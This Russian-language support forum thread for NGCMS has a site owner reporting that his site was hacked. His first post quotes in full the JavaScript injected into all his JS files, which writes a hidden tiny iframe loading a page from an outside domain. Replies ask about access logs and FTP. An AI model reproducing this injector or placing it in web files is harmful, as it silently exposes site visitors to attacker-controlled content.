Next Generation CMS :: Форум поддержки

Заинтересовала наша система? Тогда этот форум для Вас!

Вы не зашли.

#1 2012-12-24 15:43:09

Nushaba
Участник
Зарегистрирован: 2009-11-09
Сообщений: 276
Рейтинг :   

Взломали сайт

Всем привет. Столкнулся с проблемой, был взломан сайт 19.11.2012
Были модифицированы все js файлы путём добавления кода следующего содержания:

/*0fead1*/
(function()
{
 var a = document.createElement('iframe');
 a.src = 'http://www.real.dp.ua/img/upload/item/207/stats.php';
 a.style.position = 'absolute';
 a.style.border = '0';
 a.style.height = '2px';
 a.style.width = '2px';
 a.style.left = '1px';
 a.style.top = '1px';
 if(!document.getElementById('mira'))
 {
 document.write('<div id=\'mira\'></div>');
 document.getElementById('mira').appendChild(a);
 }
})();
/*/0fead1*/

Не могу понять как такое произошло. Я бы мог погрешить на то, что спалил пароль от хостинга, но тогда было бы логично что заразили бы все поддомены мои тестовые, а заразили только один, значит не спалили пароль. Взломали только тот поддомен, где стояла ngcms 0.9.3 + SVN [SVN1047+] Ещё более нелогичным можно посчитать тот факт, что взломали выключенный к показу посетителям сайт, то есть из админки я выключил его, правда не помню когда, до взлома или уже после... Как это можно проверить?

Напрашивается вывод что есть какая то уязвимость в самом движке. Встречался кто с подобной проблемой и как лечить? Сайт: o.nushaba.ru

Не в сети

#2 2012-12-24 16:17:10

easmik
VIP забанил этого пользователя.
Зарегистрирован: 2011-02-01
Сообщений: 1,031
Рейтинг :   37 

Re: Взломали сайт

Nushaba, судя по коду что тут стоит эти хакеры ломанули 9620 сайтов на НГ столько нету

Не в сети

#3 2012-12-24 16:50:10

Nushaba
Участник
Зарегистрирован: 2009-11-09
Сообщений: 276
Рейтинг :   

Re: Взломали сайт

easmik, очевидно ломали скриптом, или каким то софтом который автоматизировал процесс, иначе зачем ещё ломать сайт который выключен. Но всё же остаются вопросы, почему взломали именно сайт с ngcms внутри а не все остальные на хостинге, ну или вопрос как это сделали, тогда будет понятно что то. В общем думаю есть дыра в движке, так как аналогичный взлом был около года назад, тогда я не стал писать.

Не в сети

#4 2012-12-24 18:45:57

infinity237
Модератор
Откуда Russia, Moscow
Зарегистрирован: 2008-11-09
Сообщений: 2,674
Рейтинг :   176 
Сайт

Re: Взломали сайт

Логи то смотрели?

https://www.google.ru/search?client=ope … el=suggest

Изменено infinity237 (2012-12-24 18:57:02)

Не в сети

#5 2012-12-25 01:46:25

dampel
Участник
Зарегистрирован: 2011-09-26
Сообщений: 52
Рейтинг :   

Re: Взломали сайт

Смотрите аксесс логи в то время, когда примерно вас взломали.
ftp используете?

Изменено dampel (2012-12-25 01:47:39)

Не в сети

#6 2012-12-25 08:48:54

Nushaba
Участник
Зарегистрирован: 2009-11-09
Сообщений: 276
Рейтинг :   

Re: Взломали сайт

Таких старых логов нету, FTP использую. Но FTP поставляет хостер. Скорее всего не FTP взломали, я уже писал что остальные сайты на том же FTP не тронули.

Изменено Nushaba (2012-12-25 08:58:28)

Не в сети

#7 2012-12-25 10:27:55

infinity237
Модератор
Откуда Russia, Moscow
Зарегистрирован: 2008-11-09
Сообщений: 2,674
Рейтинг :   176 
Сайт

Re: Взломали сайт

Ну и как ты теперь хочешь чтобы мы тебе сказали где бага? big_smile

Не в сети

#8 2012-12-25 11:33:46

Nushaba
Участник
Зарегистрирован: 2009-11-09
Сообщений: 276
Рейтинг :   

Re: Взломали сайт

infinity237, вдруг телепаты существуют! ) Ладно, тогда закрываем тему.

Не в сети

#9 2013-10-02 18:01:03

Albert
Участник
Зарегистрирован: 2013-10-02
Сообщений: 1
Рейтинг :   

Re: Взломали сайт

здравствуйте я потерял пароль для входа на сайт помогите как войти на сайт? Но мне пофиг на ngcms и я не когда не поставлю ссылку на эту CMS.

Не в сети

#10 2013-10-02 18:24:46

vip
Зaбанен
Зарегистрирован: 2011-03-23
Сообщений: 1,182
Рейтинг :   213 

Re: Взломали сайт

Albert, http://ngcms.ru/forum/viewtopic.php?pid=35992#p35992

Не в сети

Подвал раздела

Работает на FluxBB